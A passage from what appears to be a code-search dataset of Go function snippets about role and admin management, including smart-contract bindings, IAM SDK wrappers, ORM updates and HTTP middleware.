previousAdminRoleItem)\n\t}\n\tvar newAdminRoleRule []interface{}\n\tfor _, newAdminRoleItem := range newAdminRole {\n\t\tnewAdminRoleRule = append(newAdminRoleRule, newAdminRoleItem)\n\t}\n\n\tlogs, sub, err := _AccessControl.contract.FilterLogs(opts, \"RoleAdminChanged\", roleRule, previousAdminRoleRule, newAdminRoleRule)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &AccessControlRoleAdminChangedIterator{contract: _AccessControl.contract, event: \"RoleAdminChanged\", logs: logs, sub: sub}, nil\n}", "func (roles *RoleProvider) Update(r *idam.Role) (*idam.Role, error) {\n\troles.lock.Lock()\n\tdefer roles.lock.Unlock()\n\n\trole, ok := roles.getRole(r.Name)\n\tif !ok {\n\t\treturn nil, idam.ErrUnknownRole\n\t}\n\n\trole.Permissions = []string{}\n\n\tfor _, p := range r.Permissions {\n\t\trole.Permissions = append(role.Permissions, p)\n\t}\n\n\trole.Updated = time.Now()\n\t// TODO(ppacher): should we also allow to update the creator of the role?\n\n\treturn copyRole(role), roles.saveToFile()\n}", "func (_TellorMesosphere *TellorMesosphereCallerSession) GetRoleAdmin(role [32]byte) ([32]byte, error) {\n\treturn _TellorMesosphere.Contract.GetRoleAdmin(&_TellorMesosphere.CallOpts, role)\n}", "func (_PermInterface *PermInterfaceSession) AssignAdminRole(_orgId string, _account common.Address, _roleId string) (*types.Transaction, error) {\n\treturn _PermInterface.Contract.AssignAdminRole(&_PermInterface.TransactOpts, _orgId, _account, _roleId)\n}", "func (m *manager) AdminUpdate(ctx context.Context) error {\n\ttoRun := m.adminUpdate()\n\treturn m.runSteps(ctx, toRun, \"adminUpdate\")\n}", "func (_Distributor *DistributorCallerSession) GetRoleAdmin(role [32]byte) ([32]byte, error) {\n\treturn _Distributor.Contract.GetRoleAdmin(&_Distributor.CallOpts, role)\n}", "func (r *RBAC) UpdateRoles(system, uid string, roles ...string) error {\n\tr.Cache.RemoveUser(system, uid)\n\treturn r.User.UpdateRoles(system, uid, roles...)\n}", "func (_DelegationController *DelegationControllerSession) GetRoleAdmin(role [32]byte) ([32]byte, error) {\n\treturn _DelegationController.Contract.GetRoleAdmin(&_DelegationController.CallOpts, role)\n}", "func (_PermInterface *PermInterfaceTransactorSession) AssignAdminRole(_orgId string, _account common.Address, _roleId string) (*types.Transaction, error) {\n\treturn _PermInterface.Contract.AssignAdminRole(&_PermInterface.TransactOpts, _orgId, _account, _roleId)\n}", "func (_AccessControl *AccessControlFilterer) WatchRoleAdminChanged(opts *bind.WatchOpts, sink chan<- *AccessControlRoleAdminChanged, role [][32]byte, previousAdminRole [][32]byte, newAdminRole [][32]byte) (event.Subscription, error) {\n\n\tvar roleRule []interface{}\n\tfor _, roleItem := range role {\n\t\troleRule = append(roleRule, roleItem)\n\t}\n\tvar previousAdminRoleRule []interface{}\n\tfor _, previousAdminRoleItem := range previousAdminRole {\n\t\tpreviousAdminRoleRule = append(previousAdminRoleRule, previousAdminRoleItem)\n\t}\n\tvar newAdminRoleRule []interface{}\n\tfor _, newAdminRoleItem := range newAdminRole {\n\t\tnewAdminRoleRule = append(newAdminRoleRule, newAdminRoleItem)\n\t}\n\n\tlogs, sub, err := _AccessControl.contract.WatchLogs(opts, \"RoleAdminChanged\", roleRule, previousAdminRoleRule, newAdminRoleRule)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn event.NewSubscription(func(quit <-chan struct{}) error {\n\t\tdefer sub.Unsubscribe()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase log := <-logs:\n\t\t\t\t// New log arrived, parse the event and forward to the user\n\t\t\t\tevent := new(AccessControlRoleAdminChanged)\n\t\t\t\tif err := _AccessControl.contract.UnpackLog(event, \"RoleAdminChanged\", log); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tevent.Raw = log\n\n\t\t\t\tselect {\n\t\t\t\tcase sink <- event:\n\t\t\t\tcase err := <-sub.Err():\n\t\t\t\t\treturn err\n\t\t\t\tcase <-quit:\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\tcase err := <-sub.Err():\n\t\t\t\treturn err\n\t\t\tcase <-quit:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t}), nil\n}", "func ChangeAdminPassword(client *gophercloud.ServiceClient, id, newPassword string) (r ActionResult) {\n\tb := map[string]interface{}{\n\t\t\"changePassword\": map[string]string{\n\t\t\t\"adminPass\": newPassword,\n\t\t},\n\t}\n\tresp, err := client.Post(actionURL(client, id), b, nil, nil)\n\t_, r.Header, r.Err = gophercloud.ParseResponse(resp, err)\n\treturn\n}", "func (r *RoleManagementRequest) Update(ctx context.Context, reqObj *RoleManagement) error {\n\treturn r.JSONRequest(ctx, \"PATCH\", \"\", reqObj, nil)\n}", "func (_DelegationController *DelegationControllerCallerSession) GetRoleAdmin(role [32]byte) ([32]byte, error) {\n\treturn _DelegationController.Contract.GetRoleAdmin(&_DelegationController.CallOpts, role)\n}", "func (s *rpcServer) UpdateAdmin(ctx context.Context, req *api.UpdateAdminRequest) (*api.UpdateAdminResponse, error) {\n\tlogger := log.GetLogger(ctx)\n\tlogger.Debugf(\"%+v\", req)\n\tadmin, err := admin.ByID(req.AdminId)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t// Update all the fields\n\tadmin.Name = req.Admin.Name\n\tadmin.Email = req.Admin.Email\n\tadmin.ACL = req.Admin.ACL\n\tif err := admin.Save(); err != nil {\n\t\treturn nil, errors.Wrap(err, \"error while saving admin to db\")\n\t}\n\treturn &api.UpdateAdminResponse{\n\t\tAdmin: &api.Admin{\n\t\t\tId: admin.ID,\n\t\t\tName: admin.Name,\n\t\t\tEmail: admin.Email,\n\t\t\tACL: admin.ACL,\n\t\t},\n\t}, nil\n}", "func (_AccessControl *AccessControlSession) GetRoleAdmin(role [32]byte) ([32]byte, error) {\n\treturn _AccessControl.Contract.GetRoleAdmin(&_AccessControl.CallOpts, role)\n}", "func (_AccessControl *AccessControlCallerSession) GetRoleAdmin(role [32]byte) ([32]byte, error) {\n\treturn _AccessControl.Contract.GetRoleAdmin(&_AccessControl.CallOpts, role)\n}", "func (o *UpdateMemberRoleAdminV1Params) WithBody(body *groupclientmodels.ModelsUpdateMemberRoleRequestV1) *UpdateMemberRoleAdminV1Params {\n\to.SetBody(body)\n\treturn o\n}", "func (client *Client) UpdateRoleWithOptions(request *UpdateRoleRequest, runtime *util.RuntimeOptions) (_result *UpdateRoleResponse, _err error) {\n\t_err = util.ValidateModel(request)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\tquery := map[string]interface{}{}\n\tif !tea.BoolValue(util.IsUnset(request.NewAssumeRolePolicyDocument)) {\n\t\tquery[\"NewAssumeRolePolicyDocument\"] = request.NewAssumeRolePolicyDocument\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.NewDescription)) {\n\t\tquery[\"NewDescription\"] = request.NewDescription\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.NewMaxSessionDuration)) {\n\t\tquery[\"NewMaxSessionDuration\"] = request.NewMaxSessionDuration\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.RoleName)) {\n\t\tquery[\"RoleName\"] = request.RoleName\n\t}\n\n\treq := &openapi.OpenApiRequest{\n\t\tQuery: openapiutil.Query(query),\n\t}\n\tparams := &openapi.Params{\n\t\tAction: tea.String(\"UpdateRole\"),\n\t\tVersion: tea.String(\"2020-03-31\"),\n\t\tProtocol: tea.String(\"HTTPS\"),\n\t\tPathname: tea.String(\"/\"),\n\t\tMethod: tea.String(\"POST\"),\n\t\tAuthType: tea.String(\"AK\"),\n\t\tStyle: tea.String(\"RPC\"),\n\t\tReqBodyType: tea.String(\"formData\"),\n\t\tBodyType: tea.String(\"json\"),\n\t}\n\t_result = &UpdateRoleResponse{}\n\t_body, _err := client.CallApi(params, req, runtime)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\t_err = tea.Convert(_body, &_result)\n\treturn _result, _err\n}", "func (aaa *RolesService) AdminGetRoleAdminStatusV3(input *roles.AdminGetRoleAdminStatusV3Params) (*iamclientmodels.ModelRoleAdminStatusResponseV3, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tok, badRequest, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.Roles.AdminGetRoleAdminStatusV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif notFound != nil {\n\t\treturn nil, notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn nil, internalServerError\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn ok.GetPayload(), nil\n}", "func (o *UpdateMemberRoleAdminV1Params) WithHTTPClient(client *http.Client) *UpdateMemberRoleAdminV1Params {\n\to.SetHTTPClient(client)\n\treturn o\n}", "func (orm *ORM) UpdateAdmin(ctx context.Context, adminID string, fullname *string, email *string, phone *string) (bool, error) {\n\tvar _Admin models.Admin\n\n\terr := orm.DB.DB.First(&_Admin, \"id = ?\", adminID).Error\n\tif errors.Is(err, gorm.ErrRecordNotFound) {\n\t\treturn false, errors.New(\"AdminNotFound\")\n\t}\n\n\tif fullname != nil {\n\t\t_Admin.FullName = *fullname\n\t}\n\tif email != nil {\n\t\t_Admin.Email = *email\n\t}\n\tif phone != nil {\n\t\t_Admin.Phone = phone\n\t}\n\torm.DB.DB.Save(&_Admin)\n\treturn true, nil\n\n}", "func saveAdmin(e echo.Context) error {\n\tdb := e.Get(\"database\").(*mgo.Database)\n\tif db == nil {\n\t\treturn fmt.Errorf(\"Bad database session\")\n\t}\n\n\ta := models.Admin{}\n\terr := e.Bind(&a)\n\tif err != nil {\n\t\treturn err\n\t}\n\ta.ServerUpdateDateTime = time.Now().UTC()\n\n\texisting := models.Admin{}\n\terr = db.C(\"Admins\").Find(bson.M{\"adminUuid\": a.AdminUUID}).One(&existing)\n\n\tif err == nil {\n\t\tif existing.ServerUpdateDateTime.After(a.LocalUpdateDateTime) {\n\t\t\t// Server version is more recent\n\t\t\treturn e.JSON(http.StatusConflict, existing)\n\t\t}\n\n\t\ta.AdminID = existing.AdminID\n\t\t_, err = db.C(\"Admins\").UpsertId(existing.AdminID, &a)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\tif a.AdminID == \"\" {\n\t\t\ta.AdminID = bson.NewObjectId().String()\n\t\t}\n\n\t\terr = db.C(\"Admins\").Insert(&a)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn e.JSON(http.StatusOK, a)\n}", "func (aaa *RolesService) AdminRemoveRoleAdminV3(input *roles.AdminRemoveRoleAdminV3Params) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.Roles.AdminRemoveRoleAdminV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn internalServerError\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (r *RoleCache) updateRoles(userID string, roles []string) error {\n\tkey := makeKey(userID)\n\tbyteVal, err := json.Marshal(&roles)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"Error marshalling roles\")\n\t}\n\n\terr = r.DB.Update(func(tx *buntdb.Tx) error {\n\t\t_, _, err := tx.Set(key, string(byteVal), nil)\n\t\treturn err\n\t})\n\n\treturn err\n}", "func AddAdminPermission(roleID int, ActionID int, Enable int8) (userRole []orm.Params, err error) {\n\to := orm.NewOrm()\n\t_, err = o.Raw(\"INSERT INTO `_admin_permission` (`role_id`,`action_id`,`enable`) VALUES (?, ?, ?)\", &roleID, &ActionID, &Enable).Values(&userRole)\n\tfmt.Println(\"=========\", userRole)\n\treturn userRole, err\n}", "func RoleEditHandler(s *discordgo.Session, r *discordgo.GuildRoleUpdate) {\n\t// Get Server object\n\tserver, err := db.GetServer(r.GuildID)\n\tif err != nil && err != db.NotFound {\n\t\tlogger.Log.Error(err.Error())\n\t\treturn\n\t} else if err == db.NotFound {\n\t\treturn\n\t}\n\n\t// Check for playing Server\n\tif !server.Playing {\n\t\treturn\n\t}\n\n\t// Check Discord Role\n\tfor _, role := range server.Roles {\n\t\tif role.ID == r.Role.ID {\n\t\t\t// Revert to game requirement\n\t\t\tif r.Role.Hoist != role.Hoist || r.Role.Mentionable != role.Mentionable || r.Role.Permissions != server.RolePerm {\n\t\t\t\t_, err = s.GuildRoleEdit(server.ID, r.Role.ID, r.Role.Name, r.Role.Color, role.Hoist, server.RolePerm, role.Mentionable)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlogger.Log.Error(err.Error())\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t}\n}", "func (o *UpdateMemberRoleAdminV1Params) WithTimeout(timeout time.Duration) *UpdateMemberRoleAdminV1Params {\n\to.SetTimeout(timeout)\n\treturn o\n}", "func (a *V1EmployeesApiService) UpdateEmployeeRole(ctx context.Context, body V1EmployeeRole, roleId string) (V1EmployeeRole, *http.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = strings.ToUpper(\"Put\")\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue V1EmployeeRole\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/v1/me/roles/{role_id}\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"role_id\"+\"}\", fmt.Sprintf(\"%v\", roleId), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := url.Values{}\n\tlocalVarFormParams := url.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = &body\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHttpResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHttpResponse == nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tlocalVarBody, err := ioutil.ReadAll(localVarHttpResponse.Body)\n\tlocalVarHttpResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tif localVarHttpResponse.StatusCode < 300 {\n\t\t// If we succeed, return the data, otherwise pass on to decode error.\n\t\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"));\n\t\tif err == nil { \n\t\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t\t}\n\t}\n\n\tif localVarHttpResponse.StatusCode >= 300 {\n\t\tnewErr := GenericSwaggerError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHttpResponse.Status,\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 200 {\n\t\t\tvar v V1EmployeeRole\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"));\n\t\t\t\tif err != nil {\n\t\t\t\t\tnewErr.error = err.Error()\n\t\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t\t}\n\t\t\t\tnewErr.model = v\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHttpResponse, nil\n}", "func NewUpdateRole(id string, name string, actions []string, projects []string) (*Role, error) {\n\trole := &Role{\n\t\tID: id,\n\t\tName: name,\n\t\tActions: actions,\n\t\tProjects: projects,\n\t}\n\n\treturn role, nil\n}", "func NewSetRoleAsAdminForbidden() *SetRoleAsAdminForbidden {\n\treturn &SetRoleAsAdminForbidden{}\n}", "func (_AccessControl *AccessControlCaller) GetRoleAdmin(opts *bind.CallOpts, role [32]byte) ([32]byte, error) {\n\tvar out []interface{}\n\terr := _AccessControl.contract.Call(opts, &out, \"getRoleAdmin\", role)\n\n\tif err != nil {\n\t\treturn *new([32]byte), err\n\t}\n\n\tout0 := *abi.ConvertType(out[0], new([32]byte)).(*[32]byte)\n\n\treturn out0, err\n\n}", "func (_TellorMesosphere *TellorMesosphereCaller) GetRoleAdmin(opts *bind.CallOpts, role [32]byte) ([32]byte, error) {\n\tvar out []interface{}\n\terr := _TellorMesosphere.contract.Call(opts, &out, \"getRoleAdmin\", role)\n\n\tif err != nil {\n\t\treturn *new([32]byte), err\n\t}\n\n\tout0 := *abi.ConvertType(out[0], new([32]byte)).(*[32]byte)\n\n\treturn out0, err\n\n}", "func (aaa *RolesService) UpdateRolePermissions(input *roles.UpdateRolePermissionsParams) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, err := aaa.Client.Roles.UpdateRolePermissions(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (s *UserRoleService) Update(userRole *UserRole) (*UserRole, error) {\n\tif userRole == nil {\n\t\treturn nil, internal.CreateRequiredParameterIsEmptyOrNilError(constants.ParameterUserRole)\n\t}\n\n\tpath, err := services.GetUpdatePath(s, userRole)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresp, err := services.ApiUpdate(s.GetClient(), userRole, new(UserRole), path)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn resp.(*UserRole), nil\n}", "func (handler httpRole) Edit() httphandler.HandlerFunc {\n\ttype Req struct {\n\t\tID string `binding:\"required\"`\n\t\tName string `binding:\"required\"`\n\t\tDescription string `binding:\"required\"`\n\t\tIcon string `binding:\"required\"`\n\t\tUpdatedAt time.Time `binding:\"required\"`\n\t}\n\tresp := jsont.F{\n\t\t\"UpdatedAt\": nil,\n\t}\n\treturn func(c *httphandler.Context) {\n\t\treq := Req{}\n\t\tif c.BindJSON(&req) {\n\t\t\treturn\n\t\t}\n\t\trec := coremodel.Role{\n\t\t\tID: req.ID,\n\t\t\tName: req.Name,\n\t\t\tDescription: req.Description,\n\t\t\tIcon: req.Icon,\n\t\t\tUpdatedAt: req.UpdatedAt,\n\t\t}\n\n\t\tbiz := corebiz.NewBizRole()\n\t\ttx := c.BeginTx(handler.DB)\n\t\terr := biz.Edit(c, tx.Tx, &rec)\n\t\tif c.HandleError(err) {\n\t\t\ttx.Rollback(c)\n\t\t\treturn\n\t\t}\n\t\ttx.Commit(c)\n\t\tc.JSONWithFields(rec, resp)\n\t}\n}", "func (aaa *RolesService) AdminCreateRoleV3(input *roles.AdminCreateRoleV3Params) (*iamclientmodels.AccountcommonRoleV3, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcreated, badRequest, unauthorized, forbidden, internalServerError, err := aaa.Client.Roles.AdminCreateRoleV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif internalServerError != nil {\n\t\treturn nil, internalServerError\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn created.GetPayload(), nil\n}", "func (bs *DefaultSecurity) UpdateAdmins(login string, delete bool) error {\n\tfor i, name := range bs.Admins.Names {\n\t\tif name == login {\n\t\t\tif delete {\n\t\t\t\tbs.Admins.Names = append(bs.Admins.Names[:i], bs.Admins.Names[i+1:]...)\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\treturn errors.New(\"Login already exists\")\n\t\t}\n\t}\n\tbs.Admins.Names = append(bs.Admins.Names, login)\n\treturn nil\n}", "func AdminUserPwdUpdate(context *gin.Context,\n\tcacheDB int,\n\tsqlHandle,\n\tadminUserID,\n\tadminUserPwd,\n\tadminUserAginPwd string) *protocol.Response {\n\n\tvar pwd, oldPwd string\n\tvar err error\n\tvar oldUser *models.AdminUser\n\tvar errResult protocol.Response\n\n\tif !util.VerifyPasswordFormat(pwd) {\n\t\tlog.Debug(\"Modify admin user password format error:%s\", pwd)\n\t\terrResult = code.SpawnErrPwdFormat()\n\t\tgoto fail\n\t}\n\n\tif pwd != adminUserAginPwd {\n\t\tlog.Debug(\"Modify admin user password first!=second\")\n\t\terrResult = code.SpawnErrPwdAgin()\n\t\tgoto fail\n\t}\n\n\toldUser, err = database.AdminUserQueryPwd(sqlHandle, adminUserID)\n\tif err != nil {\n\t\terrResult = code.SpawnErrSystemMsg(err.Error())\n\t\tgoto fail\n\t}\n\n\tpwd, err = aes.Encrypt(oldUser.Secret, adminUserPwd)\n\n\tif err = database.AdminUserPwdUpdate(sqlHandle, adminUserID, pwd); err != nil {\n\t\terrResult = code.SpawnErrSystemMsg(err.Error())\n\t\tgoto fail\n\t}\n\n\tif oldPwd, err = database.GetRdsOnlineAdminPassword(cacheDB, adminUserID); err == nil {\n\t\tif oldPwd != pwd {\n\t\t\tif err = database.WithRdsOnlineAdminPwd(cacheDB, adminUserID, pwd); err != nil {\n\t\t\t\tlog.Debug(\"Modify admin user online password error:%s\", err.Error())\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\nfail:\n\treturn &errResult\n}", "func UpdateComputerRole(appID int, HostID string, registerStatus int, appName string) {\n\tif registerStatus != 0 && registerStatus != 1 {\n\t\treturn\n\t}\n\tif appID == 0 || HostID == \"\" {\n\t\treturn\n\t}\n\t//Model 方法在接受 struct 时只会映射 id 到 where 子句中\n\tvar app model.App\n\tif appID == 0 {\n\t\t// 根据 name 查找 app\n\t\tdb.Session().Where(&model.App{Name: appName}).Find(&app)\n\t\tappID = app.ID\n\t}\n\n\tdb.Session().Model(&model.ComputerRole{}).Where(&model.ComputerRole{AppID: appID, HostID: HostID}).Update(\"register_status\", registerStatus)\n}", "func (m *VpnConfiguration) SetRole(value *string)() {\n err := m.GetBackingStore().Set(\"role\", value)\n if err != nil {\n panic(err)\n }\n}", "func (_TellorMesosphere *TellorMesosphereFilterer) FilterRoleAdminChanged(opts *bind.FilterOpts, role [][32]byte, previousAdminRole [][32]byte, newAdminRole [][32]byte) (*TellorMesosphereRoleAdminChangedIterator, error) {\n\n\tvar roleRule []interface{}\n\tfor _, roleItem := range role {\n\t\troleRule = append(roleRule, roleItem)\n\t}\n\tvar previousAdminRoleRule []interface{}\n\tfor _, previousAdminRoleItem := range previousAdminRole {\n\t\tpreviousAdminRoleRule = append(previousAdminRoleRule, previousAdminRoleItem)\n\t}\n\tvar newAdminRoleRule []interface{}\n\tfor _, newAdminRoleItem := range newAdminRole {\n\t\tnewAdminRoleRule = append(newAdminRoleRule, newAdminRoleItem)\n\t}\n\n\tlogs, sub, err := _TellorMesosphere.contract.FilterLogs(opts, \"RoleAdminChanged\", roleRule, previousAdminRoleRule, newAdminRoleRule)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &TellorMesosphereRoleAdminChangedIterator{contract: _TellorMesosphere.contract, event: \"RoleAdminChanged\", logs: logs, sub: sub}, nil\n}", "func (aaa *RolesService) AdminGetRoleV3(input *roles.AdminGetRoleV3Params) (*iamclientmodels.ModelRoleResponseV3, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tok, badRequest, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.Roles.AdminGetRoleV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif notFound != nil {\n\t\treturn nil, notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn nil, internalServerError\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn ok.GetPayload(), nil\n}", "func (role *Role) Save() error {\n\tupdate, err := role.client.Kubernetes.\n\t\tRbacV1().\n\t\tRoles(role.Namespace).\n\t\tUpdate(role.client.Ctx, &role.Role, metav1.UpdateOptions{})\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to save role %s in namespace %s: %w\", role.Name, role.Namespace, err)\n\t}\n\n\trole.Role = *update\n\n\treturn nil\n}", "func (_Distributor *DistributorCaller) GetRoleAdmin(opts *bind.CallOpts, role [32]byte) ([32]byte, error) {\n\tvar (\n\t\tret0 = new([32]byte)\n\t)\n\tout := ret0\n\terr := _Distributor.contract.Call(opts, out, \"getRoleAdmin\", role)\n\treturn *ret0, err\n}", "func (client *Client) UpdateRoleContext(\n\tctx context.Context, name string, prms *graylog.RoleUpdateParams,\n) (*graylog.Role, *ErrorInfo, error) {\n\tif name == \"\" {\n\t\treturn nil, nil, errors.New(\"name is empty\")\n\t}\n\tif prms == nil {\n\t\treturn nil, nil, fmt.Errorf(\"role is nil\")\n\t}\n\tu, err := client.Endpoints().Role(name)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\trole := &graylog.Role{}\n\tei, err := client.callPut(ctx, u.String(), prms, role)\n\treturn role, ei, err\n}", "func (m *MockClientInterface) UpdateRole(modified *v11.Role) (*v11.Role, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"UpdateRole\", modified)\n\tret0, _ := ret[0].(*v11.Role)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (aaa *RolesService) AdminGetRolesV3(input *roles.AdminGetRolesV3Params) (*iamclientmodels.ModelRoleResponseWithManagersAndPaginationV3, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tok, badRequest, unauthorized, forbidden, internalServerError, err := aaa.Client.Roles.AdminGetRolesV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif internalServerError != nil {\n\t\treturn nil, internalServerError\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn ok.GetPayload(), nil\n}", "func IsAdmin(role AuthorizationRole) bool {\n\tif role == Admin || role == Owner {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (client ModelClient) UpdateEntityRoleResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func RequireAdminRole(errToReturn cherry.ErrConstruct) gin.HandlerFunc {\n\treturn func(ctx *gin.Context) {\n\t\tif ctx.GetHeader(textproto.CanonicalMIMEHeaderKey(UserRoleXHeader)) != \"admin\" {\n\t\t\terr := errToReturn().AddDetails(\"only admin can do this\")\n\t\t\tgonic.Gonic(err, ctx)\n\t\t}\n\t}\n}", "func (aaa *RolesService) RemoveRoleAdmin(input *roles.RemoveRoleAdminParams) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, err := aaa.Client.Roles.RemoveRoleAdmin(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func UpdateAdminLoginTime(adminID string, admin *Admin) error {\n\toid, _ := primitive.ObjectIDFromHex(adminID)\n\t_, err := adminCollection.UpdateOne(context.TODO(), bson.M{\"_id\": oid}, bson.D{\n\t\tprimitive.E{Key: \"$currentDate\", Value: bson.D{\n\t\t\tprimitive.E{Key: \"last_login_at\", Value: true},\n\t\t}},\n\t})\n\tgetAdminByID(oid).Decode(&admin)\n\treturn err\n}", "func (_DelegationController *DelegationControllerCaller) GetRoleAdmin(opts *bind.CallOpts, role [32]byte) ([32]byte, error) 